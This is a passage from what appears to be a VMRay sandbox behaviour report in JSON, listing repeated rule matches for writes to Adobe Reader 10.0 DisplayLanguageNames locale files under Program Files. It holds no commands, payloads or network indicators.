"built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lv.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lv.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10180", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lv.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lv_LV.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lv_lv.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10189", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lv_lv.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nb.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nb.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10198", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nb.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nb_NO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nb_no.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10207", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nb_no.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10216", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_BE.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_be.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10225", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_be.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_BE_PREEURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_be_preeuro.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10234", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_be_preeuro.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_NL.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_nl.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10243", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_nl.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_NL_PREEURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_nl_preeuro.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10252", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_nl_preeuro.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nn_NO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nn_no.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10261", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nn_no.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pl.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pl.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10270", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pl.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pl_PL.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pl_pl.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10279", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pl_pl.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_BR.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_br.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10288", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_br.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_PT.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_pt.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10297", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_pt.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_PT_PREEURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_pt_preeuro.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10306", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_pt_preeuro.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ro.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ro.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10315", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ro.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ro_RO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ro_ro.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10324", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ro_ro.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10333", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru_RU.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru_ru.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10342", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru_ru.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru_UA.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru_ua.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10351", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru_ua.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sk.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sk.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10360", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sk.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sk_SK.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sk_sk.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10369", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sk_sk.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sl.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sl.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10378", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sl.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sl_SI.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sl_si.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10387", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sl_si.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10396", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv_FI.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv_fi.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10405", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv_fi.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv_SE.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv_se.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10414", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv_se.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.tr.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.tr.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10423", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.tr.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 